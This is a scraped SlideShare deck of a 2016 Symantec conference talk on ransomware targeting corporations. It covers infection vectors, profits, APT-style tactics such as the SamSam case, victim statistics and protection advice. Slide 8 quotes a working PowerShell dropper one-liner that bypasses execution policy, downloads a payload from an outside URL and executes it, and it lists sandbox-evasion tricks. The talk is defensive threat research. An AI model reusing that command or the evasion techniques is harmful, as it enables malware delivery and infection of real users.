SlideShare ist ein Scribd-Unternehmen logo

Corporations - the new victims of targeted ransomware

Cyber Security Alliance
Cyber Security Alliance

Candid Wueest, Cyber Security Conference 2016

Software
1 von 27
Downloaden Sie, um offline zu lesen
Copyright 2016, Symantec Corporation Candid Wüest Symantec Security Response 1 Corporations – the new victims of targeted ransomware
Copyright2016,SymantecCorporation Ransomware is popular… … because it is profitable 2
Copyright2016,SymantecCorporation 3 © Forbes
Copyright2016,SymantecCorporation WHY ? 4What if there were no hypothetical questions?
Copyright2016,SymantecCorporation Because it is profitable! $ 209 Million damage Jan-March 2016 (according to FBI) 5A clear conscience is usually the sign of a bad memory.
Copyright2016,SymantecCorporation • Email – Link to malicious file on Dropbox & Co. – Office document with malicious macro – Script file (JavaScript, VBS, PowerShell, …) • Sometimes in container (Zip, RAR, HTA, WSF, LNK,…) with password • Infected Websites – Web exploit toolkits (1.4 Mio attacks blocked / day) • Rig, Magnitude etc. – Malvertisement • With any coding language out there – Incl. Python, Powershell, JS, Google's Go Language,… The common infection vector 6Hard work never killed anyone, but why take the chance?
Copyright2016,SymantecCorporation Enabling Macros with Social Engineering 7I don’t suffer from insanity; I enjoy every minute of it.
Copyright2016,SymantecCorporation Infection droppers trends Use of scripting languages to evade detection/sandboxes – Obfuscated: JavaScript, PHP, PowerShell, Python, VBS,… – JS conditional compilation trick /*@cc_on @*/ – Macro to check for VM (environment checks) • “InkPicture_Painted” instead Document_Open() or AutoOpen() trigger • Application.RecentFiles.Count <3 – Script to check IPs before payload download (e.g. MaxMind service) • Payload execution – Execute dll with rundll32.exe and export string – Seed parameter from JS (to decrypt payload) – Encrypted archive or installer package 8 powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://********lied socialinnovation.org/plugins/office365', $f); (New-Object -com WScript.Shell).Exec($f) 2 + 2 = 5 for extremely large values of 2!
Copyright2016,SymantecCorporation Powershell ransomware 9I used to be indecisive. Now I'm not sure.
Copyright2016,SymantecCorporation Ransomware Cryptolocker expansion 10 100 new families identified in 2015 77 in 2014, 88 in 2016* CAPS LOCK – Preventing Login Since 1980.
Copyright2016,SymantecCorporation Ransomware-as-a-service 11I'd like to help you out, which way did you come in?
Copyright2016,SymantecCorporation Top 10 infections on 29.10.2016 12… error joke not found
Copyright2016,SymantecCorporation Show me the money 13 $372.53 $294.14 $679.65 $0 $100 $200 $300 $400 $500 $600 $700 $800 2014 2015 2016 • Ransom is usually requested in Bitcoins • The average ransom has more than doubled last year Artificial intelligence is no match for natural stupidity.
Copyright2016,SymantecCorporation How to make even more money? • Payment features – Tesla chat support and free sample decryption – CryptXXX steals Bitcoin wallet data – Cerber adds machines to botnet to carry out DDoS attacks. – Use of Amazon/iTunes/phone gift cards instead of Bitcoins • New threats added to ransom note – Chimera threatens to post personal data online – Jigsaw deletes random files over time – Stampado re-encrypts already encrypted files from other cryptolockers – Virolock Spreads to shares and cloud storage as fileinfector 14I didn't say it was your fault, I said I was blaming you.
Copyright2016,SymantecCorporation Where are the victims? 15 3%Canada 8% 5% United Kingdom Belgium Netherlands India3% Italy 3% 4% Germany 2% Australia 4% 8% Japan United States 31% Is “NO” the correct answer to this question? Currently big wave in Brazil
Copyright2016,SymantecCorporation 16 Businesses as a target 43% of ransomware infections occur inside organizations Employees like to open private emails at work Smith & Wesson: The original point and click interface.
Copyright2016,SymantecCorporation Advanced attack techniques 17 Recent ransomware attacks use tactics and techniques typically seen in “APT”-style attacks Infiltration Exploit server-side vulnerabilities to gain access to the network. Reconnaissance Attackers gather information that may help in later stages of the attack, such as back-up policy. Information gathered may also be used in the ransom note. Lateral movement Attackers use publicly available tools to plot out and traverse the network and gain access to strategic locations like ICS or DB systems Stealth Once the attack has been successfully carried out the attackers attempt to hide their tracks by removing any tools used. What happens if you get scared half to death, twice?
Copyright2016,SymantecCorporation Example: SamSam case • Entry point was unpatched web server; exploited JBoss vulnerability with JexBoss • Used psExec and retrieved passwords to traverse the network • Deleted backups to make recovery difficult • Deployed SamSam strain of ransomware • Removed copies of malware and associated tools to hide tracks • Ransom was 1.5 Bitcoin (~US$989) for each computer 18Everyone is entitled to his own opinion, but not to his own facts.
Copyright2016,SymantecCorporation Further TTPs seen • Attack remote access tools – Bruteforcing passwords for RDP, Teamviewer, VNC, FTP, … • Exploit webserver and jump further from there – SQLinjection to modify DB content • Spear phishing • Some groups try POS or BEC scams first, and then move to ransomware • Some «ATP» groups use ransomware instead of wiper to hide intention 19I can explain it to you, but I can not undestand it for you Not very sophisticated But often successful
Copyright2016,SymantecCorporation What are they after? • Documents • Databases (encrypt data or change password) • Fileshares/cloud (even if not mapped: passwords from mimikatz or enumtools) • Websites – E.g. added «mcrypt_encrypt()» to DB calls • The backups (to delete them, infect them or encrypt them) • In some rare cases industrial controller, more likely classical blackmailing 20If I agreed with you we’d both be wrong
Copyright2016,SymantecCorporation Victim organization profile Services 37.8% Manufacturing 17.2% Public Administration 10.2% Finance, Insurance, & Real Estate 9.8% Wholesale 8.9% Transportation, Comms, & Utilities 6.6% Retail 4.3% Construction 3.9% Mining 1.0% Agri, Forestry, & Fishing 0.5% What about Healthcare? Healthcare seeing more targeted attacks and therefore not reflected in the numbers 21All generalizations are false.
Copyright2016,SymantecCorporation Crypto is difficult (for most people) 22Press SPACEBAR once to quit or twice to save changes..
Copyright2016,SymantecCorporation Protection strategies • Backup your data (out of reach!) • Keep your system and software up-to-date • Doublecheck shared folders – Does it auto sync to cloud? – How is your fileserver protected? • Follow best practices (2FA, security software,…) – Disable scripts, powershell etc. if you dont use it • Be prepared - play the exercise drill • Some have experimented with «honeyfiles» and «folder-sinkholes» 23Always remember you're unique, just like everyone else.
Copyright2016,SymantecCorporation Don’t forget your phones 24 • Android Ransomware is out there • IoT device ransomware not seen at large in the wild, but possible
Copyright2016,SymantecCorporation  100 new families identified in 2015, most not sophisticated  Scripts are popular to evade first-step detection  Employees in organizations represent 43% of infections  There are ransomware groups going after organizations  Most attacks are not targeted, but still devastating  It is profitable for the attackers, so it won’t go away overnight Summary – keep your data safe! 25Better to understand a little than to misunderstand a lot.
Thank you! Copyright © 2016 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners. This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice. Threat Researcher - Symantec Security Response Candid Wüest
Copyright2016,SymantecCorporation 27I like birthdays, but I think too many can kill you.

Empfohlen

iOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce itiOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce itCyber Security Alliance
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptCyber Security Alliance
 
Understanding the fundamentals of attacks
Understanding the fundamentals of attacksUnderstanding the fundamentals of attacks
Understanding the fundamentals of attacksCyber Security Alliance
 
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014Jakub Kałużny
 
BSides London 2015 - Proprietary network protocols - risky business on the wire.
BSides London 2015 - Proprietary network protocols - risky business on the wire.BSides London 2015 - Proprietary network protocols - risky business on the wire.
BSides London 2015 - Proprietary network protocols - risky business on the wire.Jakub Kałużny
 
Zeronights 2015 - Big problems with big data - Hadoop interfaces security
Zeronights 2015 - Big problems with big data - Hadoop interfaces securityZeronights 2015 - Big problems with big data - Hadoop interfaces security
Zeronights 2015 - Big problems with big data - Hadoop interfaces securityJakub Kałużny
 
Security events in 2014
Security events in 2014Security events in 2014
Security events in 2014Chong-Kuan Chen
 
BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...
BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...
BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...BlueHat Security Conference
 

Empfohlen

iOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce itiOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce itCyber Security Alliance
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptCyber Security Alliance
 
Understanding the fundamentals of attacks
Understanding the fundamentals of attacksUnderstanding the fundamentals of attacks
Understanding the fundamentals of attacksCyber Security Alliance
 
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014Jakub Kałużny
 
BSides London 2015 - Proprietary network protocols - risky business on the wire.
BSides London 2015 - Proprietary network protocols - risky business on the wire.BSides London 2015 - Proprietary network protocols - risky business on the wire.
BSides London 2015 - Proprietary network protocols - risky business on the wire.Jakub Kałużny
 
Zeronights 2015 - Big problems with big data - Hadoop interfaces security
Zeronights 2015 - Big problems with big data - Hadoop interfaces securityZeronights 2015 - Big problems with big data - Hadoop interfaces security
Zeronights 2015 - Big problems with big data - Hadoop interfaces securityJakub Kałużny
 
Security events in 2014
Security events in 2014Security events in 2014
Security events in 2014Chong-Kuan Chen
 
BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...
BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...
BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...BlueHat Security Conference
 
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...BlueHat Security Conference
 
Path of Cyber Security
Path of Cyber SecurityPath of Cyber Security
Path of Cyber SecuritySatria Ady Pradana
 
Tracking Exploit Kits - Virus Bulletin 2016
Tracking Exploit Kits - Virus Bulletin 2016Tracking Exploit Kits - Virus Bulletin 2016
Tracking Exploit Kits - Virus Bulletin 2016John Bambenek
 
Malware collection and analysis
Malware collection and analysisMalware collection and analysis
Malware collection and analysisChong-Kuan Chen
 
Defcon 22-david-wyde-client-side-http-cookie-security
Defcon 22-david-wyde-client-side-http-cookie-securityDefcon 22-david-wyde-client-side-http-cookie-security
Defcon 22-david-wyde-client-side-http-cookie-securityPriyanka Aash
 
Introduction to Mobile Application Security - Techcity 2015 (Vilnius)
Introduction to Mobile Application Security - Techcity 2015 (Vilnius)Introduction to Mobile Application Security - Techcity 2015 (Vilnius)
Introduction to Mobile Application Security - Techcity 2015 (Vilnius)Luca Bongiorni
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...Zoltan Balazs
 
Taking Hunting to the Next Level: Hunting in Memory
Taking Hunting to the Next Level: Hunting in MemoryTaking Hunting to the Next Level: Hunting in Memory
Taking Hunting to the Next Level: Hunting in MemoryJoe Desimone
 
BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...
BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...
BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...BlueHat Security Conference
 
Hunting For Exploit Kits
Hunting For Exploit KitsHunting For Exploit Kits
Hunting For Exploit KitsJoe Desimone
 
BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure
BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure
BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure BlueHat Security Conference
 
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...Chris Thompson
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkEC-Council
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCanSecWest
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisChong-Kuan Chen
 
Malware for Red Team
Malware for Red TeamMalware for Red Team
Malware for Red TeamSatria Ady Pradana
 
Android Application Security
Android Application SecurityAndroid Application Security
Android Application SecurityChong-Kuan Chen
 
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...B.A.
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Xavier Ashe
 
Operation Buhtrap - AVAR 2015
Operation Buhtrap - AVAR 2015Operation Buhtrap - AVAR 2015
Operation Buhtrap - AVAR 2015ESET
 
Exploring the Capabilities and Economics of Cybercrime
Exploring the Capabilities and Economics of CybercrimeExploring the Capabilities and Economics of Cybercrime
Exploring the Capabilities and Economics of CybercrimeCylance
 
You're Off the Hook: Blinding Security Software
You're Off the Hook: Blinding Security SoftwareYou're Off the Hook: Blinding Security Software
You're Off the Hook: Blinding Security SoftwareCylance
 

Weitere ähnliche Inhalte

Was ist angesagt?

BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...BlueHat Security Conference
 
Tracking Exploit Kits - Virus Bulletin 2016
Tracking Exploit Kits - Virus Bulletin 2016Tracking Exploit Kits - Virus Bulletin 2016
Tracking Exploit Kits - Virus Bulletin 2016John Bambenek
 
Malware collection and analysis
Malware collection and analysisMalware collection and analysis
Malware collection and analysisChong-Kuan Chen
 
Defcon 22-david-wyde-client-side-http-cookie-security
Defcon 22-david-wyde-client-side-http-cookie-securityDefcon 22-david-wyde-client-side-http-cookie-security
Defcon 22-david-wyde-client-side-http-cookie-securityPriyanka Aash
 
Introduction to Mobile Application Security - Techcity 2015 (Vilnius)
Introduction to Mobile Application Security - Techcity 2015 (Vilnius)Introduction to Mobile Application Security - Techcity 2015 (Vilnius)
Introduction to Mobile Application Security - Techcity 2015 (Vilnius)Luca Bongiorni
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...Zoltan Balazs
 
Taking Hunting to the Next Level: Hunting in Memory
Taking Hunting to the Next Level: Hunting in MemoryTaking Hunting to the Next Level: Hunting in Memory
Taking Hunting to the Next Level: Hunting in MemoryJoe Desimone
 
BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...
BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...
BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...BlueHat Security Conference
 
Hunting For Exploit Kits
Hunting For Exploit KitsHunting For Exploit Kits
Hunting For Exploit KitsJoe Desimone
 
BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure
BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure
BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure BlueHat Security Conference
 
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...Chris Thompson
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkEC-Council
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCanSecWest
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisChong-Kuan Chen
 
Android Application Security
Android Application SecurityAndroid Application Security
Android Application SecurityChong-Kuan Chen
 
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...B.A.
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Xavier Ashe
 
Operation Buhtrap - AVAR 2015
Operation Buhtrap - AVAR 2015Operation Buhtrap - AVAR 2015
Operation Buhtrap - AVAR 2015ESET
 

Was ist angesagt? (20)

BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
 
Path of Cyber Security
Path of Cyber SecurityPath of Cyber Security
Path of Cyber Security
 
Tracking Exploit Kits - Virus Bulletin 2016
Tracking Exploit Kits - Virus Bulletin 2016Tracking Exploit Kits - Virus Bulletin 2016
Tracking Exploit Kits - Virus Bulletin 2016
 
Malware collection and analysis
Malware collection and analysisMalware collection and analysis
Malware collection and analysis
 
Defcon 22-david-wyde-client-side-http-cookie-security
Defcon 22-david-wyde-client-side-http-cookie-securityDefcon 22-david-wyde-client-side-http-cookie-security
Defcon 22-david-wyde-client-side-http-cookie-security
 
Introduction to Mobile Application Security - Techcity 2015 (Vilnius)
Introduction to Mobile Application Security - Techcity 2015 (Vilnius)Introduction to Mobile Application Security - Techcity 2015 (Vilnius)
Introduction to Mobile Application Security - Techcity 2015 (Vilnius)
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
 
Taking Hunting to the Next Level: Hunting in Memory
Taking Hunting to the Next Level: Hunting in MemoryTaking Hunting to the Next Level: Hunting in Memory
Taking Hunting to the Next Level: Hunting in Memory
 
BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...
BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...
BlueHat v17 || Where, how, and why is SSL traffic on mobile getting intercept...
 
Hunting For Exploit Kits
Hunting For Exploit KitsHunting For Exploit Kits
Hunting For Exploit Kits
 
BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure
BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure
BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure
 
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) -...
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
 
Malware for Red Team
Malware for Red TeamMalware for Red Team
Malware for Red Team
 
Android Application Security
Android Application SecurityAndroid Application Security
Android Application Security
 
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016
 
Operation Buhtrap - AVAR 2015
Operation Buhtrap - AVAR 2015Operation Buhtrap - AVAR 2015
Operation Buhtrap - AVAR 2015
 

Andere mochten auch

Exploring the Capabilities and Economics of Cybercrime
Exploring the Capabilities and Economics of CybercrimeExploring the Capabilities and Economics of Cybercrime
Exploring the Capabilities and Economics of CybercrimeCylance
 
You're Off the Hook: Blinding Security Software
You're Off the Hook: Blinding Security SoftwareYou're Off the Hook: Blinding Security Software
You're Off the Hook: Blinding Security SoftwareCylance
 
Embracing Threat Intelligence and Finding ROI in Your Decision
Embracing Threat Intelligence and Finding ROI in Your DecisionEmbracing Threat Intelligence and Finding ROI in Your Decision
Embracing Threat Intelligence and Finding ROI in Your DecisionCylance
 
MMW Anti-Sandbox Techniques
MMW Anti-Sandbox TechniquesMMW Anti-Sandbox Techniques
MMW Anti-Sandbox TechniquesCyphort
 
Presentación cylance
Presentación cylancePresentación cylance
Presentación cylancevictor bueno
 
MMW April 2016 Ransomware Resurgence
MMW April 2016 Ransomware Resurgence MMW April 2016 Ransomware Resurgence
MMW April 2016 Ransomware Resurgence Cyphort
 
Unikernels: Rise of the Library Hypervisor
Unikernels: Rise of the Library HypervisorUnikernels: Rise of the Library Hypervisor
Unikernels: Rise of the Library HypervisorAnil Madhavapeddy
 
Immutable Service Delivery Shenzhen 2016
Immutable Service Delivery Shenzhen 2016Immutable Service Delivery Shenzhen 2016
Immutable Service Delivery Shenzhen 2016John Willis
 
The Case For Continuous Security
The Case For Continuous SecurityThe Case For Continuous Security
The Case For Continuous SecurityThreat Stack
 
Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?Cyber Security Alliance
 
Создание акустического глубиномера
Создание акустического глубиномераСоздание акустического глубиномера
Создание акустического глубиномераkulibin
 
Digital technologies and the future of universities
Digital technologies and the future of universitiesDigital technologies and the future of universities
Digital technologies and the future of universitiesNeuza Pedro
 
O líder que descomplica o Planejamento Estratégico
O líder que descomplica o Planejamento EstratégicoO líder que descomplica o Planejamento Estratégico
O líder que descomplica o Planejamento EstratégicoDaniel Alves Vieira
 
Physical internet manifesto 1.8 2011 03-21 français
Physical internet manifesto 1.8 2011 03-21 françaisPhysical internet manifesto 1.8 2011 03-21 français
Physical internet manifesto 1.8 2011 03-21 françaisphysical_internet
 

Andere mochten auch (20)

Exploring the Capabilities and Economics of Cybercrime
Exploring the Capabilities and Economics of CybercrimeExploring the Capabilities and Economics of Cybercrime
Exploring the Capabilities and Economics of Cybercrime
 
You're Off the Hook: Blinding Security Software
You're Off the Hook: Blinding Security SoftwareYou're Off the Hook: Blinding Security Software
You're Off the Hook: Blinding Security Software
 
Embracing Threat Intelligence and Finding ROI in Your Decision
Embracing Threat Intelligence and Finding ROI in Your DecisionEmbracing Threat Intelligence and Finding ROI in Your Decision
Embracing Threat Intelligence and Finding ROI in Your Decision
 
MMW Anti-Sandbox Techniques
MMW Anti-Sandbox TechniquesMMW Anti-Sandbox Techniques
MMW Anti-Sandbox Techniques
 
Presentación cylance
Presentación cylancePresentación cylance
Presentación cylance
 
MMW April 2016 Ransomware Resurgence
MMW April 2016 Ransomware Resurgence MMW April 2016 Ransomware Resurgence
MMW April 2016 Ransomware Resurgence
 
Unikernels: Rise of the Library Hypervisor
Unikernels: Rise of the Library HypervisorUnikernels: Rise of the Library Hypervisor
Unikernels: Rise of the Library Hypervisor
 
Immutable Service Delivery Shenzhen 2016
Immutable Service Delivery Shenzhen 2016Immutable Service Delivery Shenzhen 2016
Immutable Service Delivery Shenzhen 2016
 
The Case For Continuous Security
The Case For Continuous SecurityThe Case For Continuous Security
The Case For Continuous Security
 
Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?
 
Cylance Protect-Next-Generation Antivirus-Overview
Cylance Protect-Next-Generation Antivirus-OverviewCylance Protect-Next-Generation Antivirus-Overview
Cylance Protect-Next-Generation Antivirus-Overview
 
Cylance Information Security: Compromise Assessment Datasheet
Cylance Information Security: Compromise Assessment DatasheetCylance Information Security: Compromise Assessment Datasheet
Cylance Information Security: Compromise Assessment Datasheet
 
PAY2YOU
PAY2YOUPAY2YOU
PAY2YOU
 
Mistä tilasit lentoliput vuonna 1985?
Mistä tilasit lentoliput vuonna 1985?Mistä tilasit lentoliput vuonna 1985?
Mistä tilasit lentoliput vuonna 1985?
 
Создание акустического глубиномера
Создание акустического глубиномераСоздание акустического глубиномера
Создание акустического глубиномера
 
Digital technologies and the future of universities
Digital technologies and the future of universitiesDigital technologies and the future of universities
Digital technologies and the future of universities
 
О НАС
О НАСО НАС
О НАС
 
O líder que descomplica o Planejamento Estratégico
O líder que descomplica o Planejamento EstratégicoO líder que descomplica o Planejamento Estratégico
O líder que descomplica o Planejamento Estratégico
 
Hugo Delgado - LGE
Hugo Delgado - LGEHugo Delgado - LGE
Hugo Delgado - LGE
 
Physical internet manifesto 1.8 2011 03-21 français
Physical internet manifesto 1.8 2011 03-21 françaisPhysical internet manifesto 1.8 2011 03-21 français
Physical internet manifesto 1.8 2011 03-21 français
 

Ähnlich wie Corporations - the new victims of targeted ransomware

Ransomware Attack.pptx
Ransomware Attack.pptxRansomware Attack.pptx
Ransomware Attack.pptxIkramSabir4
 
Ransomware by lokesh
Ransomware by lokeshRansomware by lokesh
Ransomware by lokeshLokesh Bysani
 
Ransomware is Coming to a Desktop Near You
Ransomware is Coming to a Desktop Near YouRansomware is Coming to a Desktop Near You
Ransomware is Coming to a Desktop Near YouCybereason
 
How to stay protected against ransomware
How to stay protected against ransomwareHow to stay protected against ransomware
How to stay protected against ransomwareSophos Benelux
 
Ransomware History and Monitoring Tips
Ransomware History and Monitoring TipsRansomware History and Monitoring Tips
Ransomware History and Monitoring TipsNetFort
 
Ransomware all locked up book
Ransomware all locked up bookRansomware all locked up book
Ransomware all locked up bookDiego Souza
 
LIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR OverviewLIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR OverviewRobert Herjavec
 
What’s the Difference Between Identity Fraud and Identity Theft?
What’s the Difference Between Identity Fraud and Identity Theft?What’s the Difference Between Identity Fraud and Identity Theft?
What’s the Difference Between Identity Fraud and Identity Theft?K7 Computing Pvt Ltd
 
What’s the Difference Between Identity Fraud and Identity Theft.docx.pptx
What’s the Difference Between Identity Fraud and Identity Theft.docx.pptxWhat’s the Difference Between Identity Fraud and Identity Theft.docx.pptx
What’s the Difference Between Identity Fraud and Identity Theft.docx.pptxkesavanrachel
 
Ransomware hostage rescue manual
Ransomware hostage rescue manualRansomware hostage rescue manual
Ransomware hostage rescue manualRoel Palmaers
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itZoltan Balazs
 
3 Tips to Stay Safe Online in 2017
3 Tips to Stay Safe Online in 20173 Tips to Stay Safe Online in 2017
